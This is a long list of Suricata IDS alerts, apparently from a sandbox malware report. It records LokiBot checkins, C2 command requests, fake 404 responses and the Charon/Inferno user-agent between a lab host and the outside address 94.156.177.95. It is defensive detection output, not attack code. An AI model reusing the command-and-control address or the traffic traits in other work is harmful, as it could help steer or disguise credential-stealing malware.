                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49936 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50016 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49795 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50016 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49923 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49971 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49888 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49905
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49832
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49875 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49754 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49767
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49760
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50054 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50054 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50054 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49785 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49971 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49761 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49971 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49763
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49761 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49936
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49855 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49971 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49875 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49978 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49754 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50054 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49808 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50054 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49965 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49965 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50010 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49923 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49875 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50010 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50010 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49785 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49895 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49748
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49895 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49895 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49971 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49855 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49855 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49971
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49895 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49888 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49888 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49855 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49865 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49855 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49754 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49875 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49754 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50084 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50084 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50084 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49923 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:50016
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49869 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49869 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49869 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49985 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49785 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49741 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49741 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49978 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49808 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49978 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49895 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49965 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49865 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50030 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49865 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49978 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50030 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49978 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49888
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49991 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49923 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50084 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50084 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49985 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49985 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49761 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49741 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49795 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:50054
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49741 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49875
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49754
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49865 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49991 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49869 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49869 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49991 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50010 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49785 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49918
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49785 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49855
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49895
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50030 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49965 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49785
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49965 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49865 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:50084
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49985 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49923
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50021 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50021 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50021 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50010 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49808
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50030 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50030 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49741 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49991 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49761 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:50010
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49761 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49884 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49884 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50021 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49865
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49991 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49741
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49869
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49884 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50063 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50063 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49956 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49978
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50021 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50073 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49965
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49795
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49956 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49884 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50073 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49956 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50073 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49991
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49985 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50073 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50073 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49761
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:50021
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50026 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50026 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49985
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:50030
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50003 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49911 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49884 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50026 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50063 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50003 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50026 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50063 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50044 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50026 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49911 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50044 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50003 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:50073
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50063 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50044 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49998 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49884
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50003 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49841 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50003 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49911 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49998 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:50026
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49956 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49841 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49956 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49998 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49911 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49911 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49942 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50044 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49911
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50044 -> 94.156.177.95:80
